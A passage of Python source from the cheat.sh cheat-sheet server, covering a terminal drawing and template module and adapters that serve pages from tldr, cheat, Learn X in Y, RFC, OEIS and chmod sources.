""" def calculate_color(i, j): if angle == None: a = 0 else: a = angle r1, g1, b1 = rgb_from_str(c1) r2, g2, b2 = rgb_from_str(c2) k = 1.0*(j-x1)/(x2-x1)*(1-a) l = 1.0*(i-y1)/(y2-y1)*a r3, g3, b3 = int(r1 + 1.0*(r2-r1)*(k+l)), int(g1 + 1.0*(g2-g1)*(k+l)), int(b1 + 1.0*(b2-b1)*(k+l)) return "#%02x%02x%02x" % (r3, g3, b3) def calculate_bg(i, j): if angle_bg == None: a = 0 else: a = angle r1, g1, b1 = rgb_from_str(bg1) r2, g2, b2 = rgb_from_str(bg2) k = 1.0*(j-x1)/(x2-x1)*(1-a) l = 1.0*(i-y1)/(y2-y1)*a r3, g3, b3 = int(r1 + 1.0*(r2-r1)*(k+l)), int(g1 + 1.0*(g2-g1)*(k+l)), int(b1 + 1.0*(b2-b1)*(k+l)) return "#%02x%02x%02x" % (r3, g3, b3) if c2 == None: for i in range(y1,y2): for j in range(x1, x2): self.field[i][j].foreground = c1 if bg1: if bg2: self.field[i][j].background = calculate_bg(i, j) else: self.field[i][j].background = bg1 else: for i in range(y1,y2): for j in range(x1, x2): self.field[i][j].foreground = calculate_color(i, j) if bg1: if bg2: self.field[i][j].background = calculate_bg(i, j) else: self.field[i][j].background = bg1 return self def put_rectangle(self, x1, y1, x2, y2, char=None, frame=None, color=None, background=None): """ Draw rectangle (x1,y1), (x2,y2) using <char> character, <color> and <background> color """ frame_chars = { 'ascii': u'++++-|', 'single': u'┌┐└┘─│', 'double': u'┌┐└┘─│', } if frame in frame_chars: chars = frame_chars[frame] else: chars = char*6 for x in range(x1, x2): self.put_point(x, y1, char=chars[4], color=color, background=background) self.put_point(x, y2, char=chars[4], color=color, background=background) for y in range(y1, y2): self.put_point(x1, y, char=chars[5], color=color, background=background) self.put_point(x2, y, char=chars[5], color=color, background=background) self.put_point(x1, y1, char=chars[0], color=color, background=background) self.put_point(x2, y1, char=chars[1], color=color, background=background) self.put_point(x1, y2, char=chars[2], color=color, background=background) self.put_point(x2, y2, char=chars[3], color=color, background=background) def put_circle(self, x0, y0, radius, char=None, color=None, background=None): """ Draw cricle with center in (x, y) and radius r (x1,y1), (x2,y2) using <char> character, <color> and <background> color """ def k(x): return int(x*1.9) f = 1 - radius ddf_x = 1 ddf_y = -2 * radius x = 0 y = radius self.put_point(x0, y0 + radius, char=char, color=color, background=background) self.put_point(x0, y0 - radius, char=char, color=color, background=background) self.put_point(x0 + k(radius), y0, char=char, color=color, background=background) self.put_point(x0 - k(radius), y0, char=char, color=color, background=background) char = "x" while x < y: if f >= 0: y -= 1 ddf_y += 2 f += ddf_y x += 1 ddf_x += 2 f += ddf_x self.put_point(x0 + k(x), y0 + y, char=char, color=color, background=background) self.put_point(x0 - k(x), y0 + y, char=char, color=color, background=background) self.put_point(x0 + k(x), y0 - y, char=char, color=color, background=background) self.put_point(x0 - k(x), y0 - y, char=char, color=color, background=background) self.put_point(x0 + k(y), y0 + x, char=char, color=color, background=background) self.put_point(x0 - k(y), y0 + x, char=char, color=color, background=background) self.put_point(x0 + k(y), y0 - x, char=char, color=color, background=background) self.put_point(x0 - k(y), y0 - x, char=char, color=color, background=background) def read_ansi(self, seq, x=0, y=0, transparence=True): """ Read ANSI sequence and render it to the panela starting from x and y. 
If transparence is True, replace spaces with "" """ screen = pyte.screens.Screen(self.size_x, self.size_y+1) stream = pyte.streams.ByteStream() stream.attach(screen) stream.feed(seq.replace('\n', '\r\n')) for i, line in sorted(screen.buffer.items(), key=lambda x: x[0]): for j, char in sorted(line.items(), key=lambda x: x[0]): if j >= self.size_x: break self.field[i][j] = Point(char.data, color_mapping(char.fg), color_mapping(char.bg)) def __str__(self): answer = "" skip_next = False for i, line in enumerate(self.field): for j, c in enumerate(line): fg_ansi = "" bg_ansi = "" stop = "" if self.field[i][j].foreground: fg_ansi = '\033[38;2;%s;%s;%sm' % rgb_from_str(self.field[i][j].foreground) stop = colored.attr("reset") if self.field[i][j].background: bg_ansi = '\033[48;2;%s;%s;%sm' % rgb_from_str(self.field[i][j].background) stop = colored.attr("reset") char = c.char or " " if not skip_next: answer += fg_ansi + bg_ansi + char.encode('utf-8') + stop skip_next = wcswidth(char) == 2 # answer += "...\n" answer += "\n" return answer ######################################################################################################## class Template(object): def __init__(self): self._mode = 'page' self.page = [] self.mask = [] self.code = [] self.panela = None self._colors = { 'A': '#00cc00', 'B': '#00cc00', 'C': '#00aacc', 'D': '#888888', 'E': '#cccc00', 'F': '#ff0000', 'H': '#22aa22', 'I': '#cc0000', 'J': '#000000', } self._bg_colors = { 'G': '#555555', 'J': '#555555', } def _process_line(self, line): if line == 'mask': self._mode = 'mask' if line == '': self._mode = 'code' def read(self, filename): """ Read template from `filename` """ with open(filename) as f: self._mode = 'page' for line in f.readlines(): line = line.rstrip('\n') if line.startswith('==[') and line.endswith(']=='): self._process_line(line[3:-3].strip()) continue if self._mode == 'page': self.page.append(line) elif self._mode == 'mask': self.mask.append(line) elif self._mode == 'code': self.mask.append(line) def apply_mask(self): lines = self.page x_size = max([len(x) for x in lines]) y_size = len(lines) self.panela = Panela(x=x_size, y=y_size) self.panela.read_ansi("".join("%s\n" % x for x in self.page)) for i, line in enumerate(self.mask): for j, char in enumerate(line): if char in self._colors or char in self._bg_colors: color = self._colors.get(char) bg_color = self._bg_colors.get(char) self.panela.put_point(j, i, color=color, background=bg_color) def show(self): if self.panela: return str(self.panela) return self.page def main(): "Only for experiments" pagepath = os.path.join(MYDIR, "share/firstpage-v2.pnl") template = Template() template.read(pagepath) template.apply_mask() sys.stdout.write(template.show()) if __name__ == '__main__': main() File: lib/panela/colors.py import os import json COLORS_JSON = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'colors.json') COLOR_TABLE = json.loads(open(COLORS_JSON, 'r').read()) VALID_COLORS = [x['hexString'] for x in COLOR_TABLE] HEX_TO_ANSI = {x['hexString']:x['colorId'] for x in COLOR_TABLE} def rgb_from_str(s): # s starts with a #. 
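    # e.g. rgb_from_str("#00cc00") -> (0, 204, 0)   (illustrative)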
r, g, b = int(s[1:3],16), int(s[3:5], 16),int(s[5:7], 16) return r, g, b def find_nearest_color(hex_color): R, G, B = rgb_from_str(hex_color) mindiff = None for d in VALID_COLORS: r, g, b = rgb_from_str(d) diff = abs(R -r)*256 + abs(G-g)* 256 + abs(B- b)* 256 if mindiff is None or diff < mindiff: mindiff = diff mincolorname = d return mincolorname File: lib/adapter/latenz.py """ Adapter for the curlable latencies numbers (chubin/late.nz) This module can be an example of a adapter for a python project. The adapter exposes one page ("latencies") and several its aliases ("latencies", "late.nz", "latency") """ # pylint: disable=relative-import import sys import os from .git_adapter import GitRepositoryAdapter class Latenz(GitRepositoryAdapter): """ chubin/late.nz Adapter """ _adapter_name = "late.nz" _output_format = "ansi" _repository_url = "https://github.com/chubin/late.nz" def _get_page(self, topic, request_options=None): sys.path.append(os.path.join(self.local_repository_location(), 'bin')) import latencies return latencies.render() def _get_list(self, prefix=None): return ['latencies'] def is_found(self, topic): return topic.lower() in ['latencies', 'late.nz', 'latency'] File: lib/adapter/tldr.py """ Adapter for https://github.com/cheat/cheat Cheatsheets are located in `pages/*/` Each cheat sheet is a separate file with extension .md The pages are formatted with a markdown dialect """ # pylint: disable=relative-import,abstract-method import re import os from .git_adapter import GitRepositoryAdapter class Tldr(GitRepositoryAdapter): """ tldr-pages/tldr adapter """ _adapter_name = "tldr" _output_format = "code" _cache_needed = True _repository_url = "https://github.com/tldr-pages/tldr" _cheatsheet_files_prefix = "pages/*/" _cheatsheet_files_extension = ".md" @staticmethod def _format_page(text): """ Trivial tldr Markdown implementation. * Header goes until the first empty line after > prefixed lines. * code surrounded with `` => code * {{var}} => var """ answer = [] skip_empty = False header = 2 for line in text.splitlines(): if line.strip() == '': if skip_empty and not header: continue if header == 1: header = 0 if header: continue else: skip_empty = False if line.startswith('-'): line = '# '+line[2:] skip_empty = True elif line.startswith('> '): if header == 2: header = 1 line = '# '+line[2:] skip_empty = True elif line.startswith('`') and line.endswith('`'): line = line[1:-1] line = re.sub(r'{{(.*?)}}', r'\1', line) answer.append(line) return "\n".join(answer) def _get_page(self, topic, request_options=None): """ Go through pages/{common,linux,osx,sunos,windows}/ and as soon as anything is found, format and return it. 
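        For example (illustrative), a request for "tar" is served from
        pages/common/tar.md if that file exists in the local checkout.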
""" search_order = ['common', 'linux', 'osx', 'sunos', 'windows', "android"] local_rep = self.local_repository_location() ext = self._cheatsheet_files_extension filename = None for subdir in search_order: _filename = os.path.join( local_rep, 'pages', subdir, "%s%s" % (topic, ext)) if os.path.exists(_filename): filename = _filename break if filename: answer = self._format_page(open(filename, 'r').read()) else: # though it should not happen answer = '' return answer @classmethod def get_updates_list(cls, updated_files_list): """ If a .md file was updated, invalidate cache entry with the name of this file """ answer = [] ext = cls._cheatsheet_files_extension for entry in updated_files_list: if entry.endswith(ext): answer.append(entry.split('/')[-1][:-len(ext)]) return answer File: lib/adapter/internal.py """ Configuration parameters: frontend.styles path.internal.pages """ import sys import os import collections try: from rapidfuzz import process, fuzz _USING_FUZZYWUZZY=False except ImportError: from fuzzywuzzy import process, fuzz _USING_FUZZYWUZZY=True from config import CONFIG from .adapter import Adapter from fmt.internal import colorize_internal _INTERNAL_TOPICS = [ ":cht.sh", ":bash_completion", ":emacs", ":emacs-ivy", ":firstpage", ":firstpage-v1", ":firstpage-v2", ":fish", ":help", ":intro", ":list", ":post", ":styles", ":styles-demo", ":vim", ":zsh", ] _COLORIZED_INTERNAL_TOPICS = [ ':intro', ] class InternalPages(Adapter): _adapter_name = 'internal' _output_format = 'ansi' def __init__(self, get_topic_type=None, get_topics_list=None): Adapter.__init__(self) self.get_topic_type = get_topic_type self.get_topics_list = get_topics_list def _get_stat(self): stat = collections.Counter([ self.get_topic_type(topic) for topic in self.get_topics_list() ]) answer = "" for key, val in stat.items(): answer += "%s %s\n" % (key, val) return answer @staticmethod def get_list(prefix=None): return _INTERNAL_TOPICS def _get_list_answer(self, topic, request_options=None): if '/' in topic: topic_type, topic_name = topic.split('/', 1) if topic_name == ":list": topic_list = [x[len(topic_type)+1:] for x in self.get_topics_list() if x.startswith(topic_type + "/")] return "\n".join(topic_list)+"\n" answer = "" if topic == ":list": answer = "\n".join(x for x in self.get_topics_list()) + "\n" return answer def _get_page(self, topic, request_options=None): if topic.endswith('/:list') or topic.lstrip('/') == ':list': return self._get_list_answer(topic) answer = "" if topic == ':styles': answer = "\n".join(CONFIG["frontend.styles"]) + "\n" elif topic == ":stat": answer = self._get_stat()+"\n" elif topic in _INTERNAL_TOPICS: answer = open(os.path.join(CONFIG["path.internal.pages"], topic[1:]+".txt"), "r").read() if topic in _COLORIZED_INTERNAL_TOPICS: answer = colorize_internal(answer) return answer def is_found(self, topic): return ( topic in self.get_list() or topic.endswith('/:list') ) class UnknownPages(InternalPages): _adapter_name = 'unknown' _output_format = 'text' @staticmethod def get_list(prefix=None): return [] @staticmethod def is_found(topic): return True def _get_page(self, topic, request_options=None): topics_list = self.get_topics_list() if topic.startswith(':'): topics_list = [x for x in topics_list if x.startswith(':')] else: topics_list = [x for x in topics_list if not x.startswith(':')] if _USING_FUZZYWUZZY: possible_topics = process.extract(topic, topics_list, scorer=fuzz.ratio)[:3] else: possible_topics = process.extract(topic, topics_list, limit=3, scorer=fuzz.ratio) possible_topics_text = 
"\n".join([(" * %s %s" % (x[0], int(x[1]))) for x in possible_topics]) return """ Unknown topic. Do you mean one of these topics maybe? %s """ % possible_topics_text class Search(Adapter): _adapter_name = 'search' _output_format = 'text' _cache_needed = False @staticmethod def get_list(prefix=None): return [] def is_found(self, topic): return False File: lib/adapter/cmd.py """ """ # pylint: disable=unused-argument,abstract-method import os.path import re from subprocess import Popen, PIPE from .adapter import Adapter def _get_abspath(path): """Find absolute path of the specified `path` according to its """ if path.startswith("/"): return path import __main__ return os.path.join( os.path.dirname(os.path.dirname(__main__.__file__)), path) class CommandAdapter(Adapter): """ """ _command = [] def _get_command(self, topic, request_options=None): return self._command def _get_page(self, topic, request_options=None): cmd = self._get_command(topic, request_options=request_options) if cmd: try: proc = Popen(cmd, stdout=PIPE, stderr=PIPE) answer = proc.communicate()[0].decode('utf-8', 'ignore') except OSError: return "ERROR of the \"%s\" adapter: please create an issue" % self._adapter_name return answer return "" class Fosdem(CommandAdapter): """ Show the output of the `current-fosdem-slide` command, which shows the current slide open in some terminal. This was used during the talk at FOSDEM 2019. https://www.youtube.com/watch?v=PmiK0JCdh5A `sudo` is used here because the session was running under a different user; to be able to use the command via sudo, the following `/etc/suders` entry was added: srv ALL=(ALL:ALL) NOPASSWD: /usr/local/bin/current-fosdem-slide Here `srv` is the user under which the cheat.sh server was running """ _adapter_name = "fosdem" _output_format = "ansi" _pages_list = [":fosdem"] _command = ["sudo", "/usr/local/bin/current-fosdem-slide"] class Translation(CommandAdapter): """ """ _adapter_name = "translation" _output_format = "text" _cache_needed = True def _get_page(self, topic, request_options=None): from_, topic = topic.split('/', 1) to_ = request_options.get('lang', 'en') if '-' in from_: from_, to_ = from_.split('-', 1) return ["/home/igor/cheat.sh/bin/get_translation", from_, to_, topic.replace('+', ' ')] class AdapterRfc(CommandAdapter): """ Show RFC by its number. Exported as: "/rfc/NUMBER" """ _adapter_name = "rfc" _output_format = "text" _cache_needed = True _command = ["share/adapters/rfc.sh"] def _get_command(self, topic, request_options=None): cmd = self._command[:] if not cmd[0].startswith("/"): cmd[0] = _get_abspath(cmd[0]) # cut rfc/ off if topic.startswith("rfc/"): topic = topic[4:] return cmd + [topic] def _get_list(self, prefix=None): return list("rfc/%s" % x for x in range(1, 8649)) def is_found(self, topic): return True class AdapterOeis(CommandAdapter): """ Show OEIS by its number. 
Exported as: "/oeis/NUMBER" """ _adapter_name = "oeis" _output_format = "text+code" _cache_needed = True _command = ["share/adapters/oeis.sh"] @staticmethod def _get_filetype(topic): if "/" in topic: language = topic.split("/")[-1].lower() return language return "bash" def _get_command(self, topic, request_options=None): cmd = self._command[:] if not cmd[0].startswith("/"): cmd[0] = _get_abspath(cmd[0]) # cut oeis/ off # Replace all non (alphanumeric, '-', ':') chars with Spaces to delimit args to oeis.sh if topic.startswith("oeis/"): topic = topic[5:] suffix = "" if topic.endswith("/:list"): suffix = " :list" topic = topic[:-6] topic = re.sub('[^a-zA-Z0-9-:]+', ' ', topic) + suffix return cmd + [topic] def is_found(self, topic): return True class AdapterChmod(CommandAdapter): """ Show chmod numeric values and strings Exported as: "/chmod/NUMBER" """ _adapter_name = "chmod" _output_format = "text" _cache_needed = True _command = ["share/adapters/chmod.sh"] def _get_command(self, topic, request_options=None): cmd = self._command[:] # cut chmod/ off # remove all non (alphanumeric, '-') chars if topic.startswith("chmod/"): topic = topic[6:] topic = re.sub('[^a-zA-Z0-9-]', '', topic) return cmd + [topic] def is_found(self, topic): return True File: lib/adapter/adapter.py """ `Adapter`, base class of the adapters. Configuration parameters: path.repositories """ import abc import os from six import with_metaclass from config import CONFIG class AdapterMC(type): """ Adapter Metaclass. Defines string representation of adapters """ def __repr__(cls): if hasattr(cls, '_class_repr'): return getattr(cls, '_class_repr')() return super(AdapterMC, cls).__repr__() class Adapter(with_metaclass(AdapterMC, object)): """ An abstract class, defines methods: (cheat sheets retrieval) * get_list * is_found * is_cache_needed (repositories management) " fetch * update and several properties that have to be set in each adapter subclass. """ _adapter_name = None _output_format = 'code' _cache_needed = False _repository_url = None _local_repository_location = None _cheatsheet_files_prefix = "" _cheatsheet_files_extension = "" _pages_list = [] @classmethod def _class_repr(cls): return '[Adapter: %s (%s)]' % (cls._adapter_name, cls.__name__) def __init__(self): self._list = {None: self._get_list()} @classmethod def name(cls): """ Return name of the adapter """ return cls._adapter_name @abc.abstractmethod def _get_list(self, prefix=None): return self._pages_list def get_list(self, prefix=None): """ Return available pages for `prefix` """ if prefix in self._list: return self._list[prefix] self._list[prefix] = set(self._get_list(prefix=prefix)) return self._list[prefix] def is_found(self, topic): """ check if `topic` is available CAUTION: only root is checked """ return topic in self._list[None] def is_cache_needed(self): """ Return True if answers should be cached. Return False if answers should not be cached. """ return self._cache_needed @staticmethod def _format_page(text): """ Preformatting page hook. Converts `text` (as in the initial repository) to text (as to be displayed). 
""" return text @abc.abstractmethod def _get_page(self, topic, request_options=None): """ Return page for `topic` """ pass def _get_output_format(self, topic): if '/' in topic: subquery = topic.split('/')[-1] else: subquery = topic if subquery in [':list']: return 'text' return self._output_format # pylint: disable=unused-argument @staticmethod def _get_filetype(topic): """ Return language name (filetype) for `topic` """ return None def get_page_dict(self, topic, request_options=None): """ Return page dict for `topic` """ # # if _get_page() returns a dict, use the dictionary # for the answer. It is possible to specify some # useful properties as the part of the answer # (e.g. "cache") # answer by _get_page() always overrides all default properties # answer = self._get_page(topic, request_options=request_options) if not isinstance(answer, dict): answer = {"answer": answer} answer_dict = { 'topic': topic, 'topic_type': self._adapter_name, 'format': self._get_output_format(topic), 'cache': self._cache_needed, } answer_dict.update(answer) # pylint: disable=assignment-from-none filetype = self._get_filetype(topic) if filetype: answer_dict["filetype"] = filetype return answer_dict @classmethod def local_repository_location(cls, cheat_sheets_location=False): """ Return local repository location. If name `self._repository_url` for the class is not specified, return None It is possible that several adapters has the same repository_url, in this case they should use the same local directory. If for some reason the local repository location should be overridden (e.g. if several different branches of the same repository are used) if should set in `self._local_repository_location` of the adapter. If `cheat_sheets_location` is specified, return path of the cheat sheets directory instead of the repository directory. """ dirname = None if cls._local_repository_location: dirname = cls._local_repository_location if not dirname and cls._repository_url: dirname = cls._repository_url if dirname.startswith('https://'): dirname = dirname[8:] elif dirname.startswith('http://'): dirname = dirname[7:] # if we did not manage to find out dirname up to this point, # that means that neither repository url, not repository location # is specified for the adapter, so it should be skipped if not dirname: return None if dirname.startswith('/'): return dirname # it is possible that several repositories will # be mapped to the same location name # (because only the last part of the path is used) # in this case provide the name in _local_repository_location # (detected by fetch.py) if '/' in dirname: dirname = dirname.split('/')[-1] path = os.path.join(CONFIG['path.repositories'], dirname) if cheat_sheets_location: path = os.path.join(path, cls._cheatsheet_files_prefix) return path @classmethod def repository_url(cls): """ Return URL of the upstream repository """ return cls._repository_url @classmethod def fetch_command(cls): """ Initial fetch of the repository. Return cmdline that has to be executed to fetch the repository. Skipping if `self._repository_url` is not specified """ if not cls._repository_url: return None # in this case `fetch` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) @classmethod def update_command(cls): """ Update of the repository. Return cmdline that has to be executed to update the repository inside `local_repository_location()`. 
""" if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) @classmethod def current_state_command(cls): """ Get current state of repository (current revision). This is used to find what cache entries should be invalidated. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) @classmethod def save_state(cls, state): """ Save state `state` of the repository. Must be called after the cache clean up. """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') open(state_filename, 'w').write(state) @classmethod def get_state(cls): """ Return the saved `state` of the repository. If state cannot be read, return None """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') state = None if os.path.exists(state_filename): state = open(state_filename, 'r').read() return state @classmethod def get_updates_list_command(cls): """ Return the command to get the list of updates since the last update whose id is saved as the repository state (`cached_state`). The list is used to invalidate the cache. """ return None @classmethod def get_updates_list(cls, updated_files_list): """ Return the pages that have to be invalidated if the files `updates_files_list` were updated in the repository. """ if not cls._cheatsheet_files_prefix: return updated_files_list answer = [] cut_len = len(cls._cheatsheet_files_prefix) for entry in updated_files_list: if entry.startswith(cls._cheatsheet_files_prefix): answer.append(entry[cut_len:]) else: answer.append(entry) return answer def all_adapters(as_dict=False): """ Return list of all known adapters If `as_dict` is True, return dict {'name': adapter} instead of a list. 
""" def _all_subclasses(cls): return set(cls.__subclasses__()).union(set( [s for c in cls.__subclasses__() for s in _all_subclasses(c)] )) if as_dict: return {x.name():x for x in _all_subclasses(Adapter)} return list(_all_subclasses(Adapter)) def adapter_by_name(name): """ Return adapter having this name, or None if nothing found """ return all_adapters(as_dict=True).get(name) File: lib/adapter/cheat_cheat.py """ Adapter for https://github.com/cheat/cheat Cheatsheets are located in `cheat/cheatsheets/` Each cheat sheet is a separate file without extension """ # pylint: disable=relative-import,abstract-method from .git_adapter import GitRepositoryAdapter class Cheat(GitRepositoryAdapter): """ cheat/cheat adapter """ _adapter_name = "cheat" _output_format = "code" _cache_needed = True _repository_url = "https://github.com/cheat/cheatsheets" _cheatsheet_files_prefix = "" _cheatsheet_file_mask = "*" File: lib/adapter/question.py """ Configuration parameters: path.internal.bin.upstream """ # pylint: disable=relative-import from __future__ import print_function import os import re from subprocess import Popen, PIPE from polyglot.detect import Detector from polyglot.detect.base import UnknownLanguage from config import CONFIG from languages_data import SO_NAME from .upstream import UpstreamAdapter NOT_FOUND_MESSAGE = """404 NOT FOUND Unknown cheat sheet. Please try to reformulate your query. Query format: /LANG/QUESTION Examples: /python/read+json /golang/run+external+program /js/regex+search See /:help for more info. If the problem persists, file a GitHub issue at github.com/chubin/cheat.sh or ping @igor_chubin """ class Question(UpstreamAdapter): """ Answer to a programming language question, using Stackoverflow as the main data source. Heavy lifting is done by an external program `CONFIG["path.internal.bin.upstream"]`. If the program is not found, fallback to the superclass `UpstreamAdapter`, which queries the upstream server (by default https://cheat.sh/) for the answer """ _adapter_name = "question" _output_format = "text+code" _cache_needed = True def _get_page(self, topic, request_options=None): """ Find answer for the `topic` question. 
""" if not os.path.exists(CONFIG["path.internal.bin.upstream"]): # if the upstream program is not found, use normal upstream adapter self._output_format = "ansi" return UpstreamAdapter._get_page(self, topic, request_options=request_options) topic = topic.replace('+', ' ') # if there is a language name in the section name, # cut it off (de:python => python) if '/' in topic: section_name, topic = topic.split('/', 1) if ':' in section_name: _, section_name = section_name.split(':', 1) section_name = SO_NAME.get(section_name, section_name) topic = "%s/%s" % (section_name, topic) # some clients send queries with - instead of + so we have to rewrite them to topic = re.sub(r"(?<!-)-", ' ', topic) topic_words = topic.split() topic = " ".join(topic_words) lang = 'en' try: query_text = topic # " ".join(topic) query_text = re.sub('^[^/]*/+', '', query_text.rstrip('/')) query_text = re.sub('/[0-9]+$', '', query_text) query_text = re.sub('/[0-9]+$', '', query_text) detector = Detector(query_text) supposed_lang = detector.languages[0].code if len(topic_words) > 2 \ or supposed_lang in ['az', 'ru', 'uk', 'de', 'fr', 'es', 'it', 'nl']: lang = supposed_lang if supposed_lang.startswith('zh_') or supposed_lang == 'zh': lang = 'zh' elif supposed_lang.startswith('pt_'): lang = 'pt' if supposed_lang in ['ja', 'ko']: lang = supposed_lang except UnknownLanguage: print("Unknown language (%s)" % query_text) if lang != 'en': topic = ['--human-language', lang, topic] else: topic = [topic] cmd = [CONFIG["path.internal.bin.upstream"]] + topic proc = Popen(cmd, stdin=open(os.devnull, "r"), stdout=PIPE, stderr=PIPE) answer = proc.communicate()[0].decode('utf-8') if not answer: return NOT_FOUND_MESSAGE return answer def get_list(self, prefix=None): return [] def is_found(self, topic): return True File: lib/adapter/__init__.py """ Import all adapters from the current directory and make them available for import as adapter_module.AdapterName """ # pylint: disable=wildcard-import,relative-import from os.path import dirname, basename, isfile, join import glob __all__ = [ basename(f)[:-3] for f in glob.glob(join(dirname(__file__), "*.py")) if isfile(f) and not f.endswith('__init__.py')] from .adapter import all_adapters from . import * File: lib/adapter/cheat_sheets.py """ Implementation of the adapter for the native cheat.sh cheat sheets repository, cheat.sheets. The cheat sheets repository is hierarchically structured: cheat sheets covering programming languages are are located in subdirectories. """ # pylint: disable=relative-import import os import glob from .git_adapter import GitRepositoryAdapter def _remove_initial_underscore(filename): if filename.startswith('_'): filename = filename[1:] return filename def _sanitize_dirnames(filename, restore=False): """ Remove (or add) leading _ in the directories names in `filename` The `restore` param means that the path name should be restored from the queryname, i.e. conversion should be done in the opposite direction """ parts = filename.split('/') newparts = [] for part in parts[:-1]: if restore: newparts.append('_'+part) continue if part.startswith('_'): newparts.append(part[1:]) else: newparts.append(part) newparts.append(parts[-1]) return "/".join(newparts) class CheatSheets(GitRepositoryAdapter): """ Adapter for the cheat.sheets cheat sheets. 
""" _adapter_name = "cheat.sheets" _output_format = "code" _repository_url = "https://github.com/chubin/cheat.sheets" _cheatsheet_files_prefix = "sheets/" def _get_list(self, prefix=None): """ Return all files on the first and the second level, excluding directories and hidden files """ hidden_files = ["_info.yaml"] answer = [] prefix = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix) for mask in ['*', '*/*']: template = os.path.join( prefix, mask) answer += [ _sanitize_dirnames(f_name[len(prefix):]) for f_name in glob.glob(template) if not os.path.isdir(f_name) and os.path.basename(f_name) not in hidden_files] return sorted(answer) def _get_page(self, topic, request_options=None): filename = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, _sanitize_dirnames(topic, restore=True)) if os.path.exists(filename): answer = self._format_page(open(filename, 'r').read()) else: # though it should not happen answer = "%s:%s not found" % (str(self.__class__), topic) return answer class CheatSheetsDir(CheatSheets): """ Adapter for the cheat sheets directories. Provides pages named according to subdirectories: _dir => dir/ (currently only _get_list() is used; _get_page is shadowed by the CheatSheets adapter) """ _adapter_name = "cheat.sheets dir" _output_format = "text" def _get_list(self, prefix=None): template = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, '*') answer = sorted([ _remove_initial_underscore(os.path.basename(f_name)) + "/" for f_name in glob.glob(template) if os.path.isdir(f_name)]) return answer def _get_page(self, topic, request_options=None): """ Content of the `topic` dir is the list of the pages in the dir """ template = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, topic.rstrip('/'), '*') answer = sorted([ os.path.basename(f_name) for f_name in glob.glob(template)]) return "\n".join(answer) + "\n" def is_found(self, topic): return CheatSheets.is_found(self, topic.rstrip('/')) File: lib/adapter/learnxiny.py """ Adapters for the cheat sheets from the Learn X in Y project Configuration parameters: log.level """ # pylint: disable=relative-import from __future__ import print_function import os import re from config import CONFIG from .git_adapter import GitRepositoryAdapter class LearnXinY(GitRepositoryAdapter): """ Adapter for the LearnXinY project """ _adapter_name = 'learnxiny' _output_format = 'code' _cache_needed = True _repository_url = "https://github.com/adambard/learnxinyminutes-docs" def __init__(self): self.adapters = _ADAPTERS GitRepositoryAdapter.__init__(self) def _get_page(self, topic, request_options=None): """ Return cheat sheet for `topic` or empty string if nothing found """ lang, topic = topic.split('/', 1) if lang not in self.adapters: return '' return self.adapters[lang].get_page(topic) def _get_list(self, prefix=None): """ Return list of all learnxiny topics """ answer = [] for language_adapter in self.adapters.values(): answer += language_adapter.get_list(prefix=True) return answer def is_found(self, topic): """ Return whether `topic` is a valid learnxiny topic """ if '/' not in topic: return False lang, topic = topic.split('/', 1) if lang not in self.adapters: return False return self.adapters[lang].is_valid(topic) class LearnXYAdapter(object): """ Parent class of all languages adapters """ _learn_xy_path = LearnXinY.local_repository_location() _replace_with = {} _filename = '' prefix = '' _replace_with = {} _splitted = True 
_block_cut_start = 2 _block_cut_end = 0 def __init__(self): self._whole_cheatsheet = self._read_cheatsheet() self._blocks = self._extract_blocks() self._topics_list = [x for x, _ in self._blocks] if "Comments" in self._topics_list: self._topics_list = [x for x in self._topics_list if x != "Comments"] + ["Comments"] self._topics_list += [":learn", ":list"] if self._whole_cheatsheet and CONFIG.get("log.level") >= 5: print(self.prefix, self._topics_list) def _is_block_separator(self, before, now, after): if (re.match(r'////////*', before) and re.match(r'// ', now) and re.match(r'////////*', after)): block_name = re.sub(r'//\s*', '', now).replace('(', '').replace(')', '') block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None def _cut_block(self, block, start_block=False): if not start_block: answer = block[self._block_cut_start:-self._block_cut_end] if answer == []: return answer if answer[0].strip() == '': answer = answer[1:] if answer[-1].strip() == '': answer = answer[:1] return answer def _read_cheatsheet(self): filename = os.path.join(self._learn_xy_path, self._filename) # if cheat sheets are not there (e.g. were not yet fetched), # just skip it if not os.path.exists(filename): return None with open(filename) as f_cheat_sheet: code_mode = False answer = [] for line in f_cheat_sheet.readlines(): if line.startswith('```'): if not code_mode: code_mode = True continue else: code_mode = False if code_mode: answer.append(line.rstrip('\n')) return answer def _extract_blocks(self): if not self._splitted: return [] lines = self._whole_cheatsheet if lines is None: return [] answer = [] block = [] block_name = "Comments" for before, now, after in zip([""]+lines, lines, lines[1:]): new_block_name = self._is_block_separator(before, now, after) if new_block_name: if block_name: block_text = self._cut_block(block) if block_text != []: answer.append((block_name, block_text)) block_name = new_block_name block = [] continue else: block.append(before) answer.append((block_name, self._cut_block(block))) return answer def is_valid(self, name): """ Check whether topic `name` is valid. """ for topic_list in self._topics_list: if topic_list == name: return True return False def get_list(self, prefix=None): """ Get list of topics for `prefix` """ if prefix: return ["%s/%s" % (self.prefix, x) for x in self._topics_list] return self._topics_list def get_page(self, name, partial=False): """ Return specified cheat sheet `name` for the language. 
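        The special names ":list" and ":learn" return the topic list and the
        whole cheat sheet respectively.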
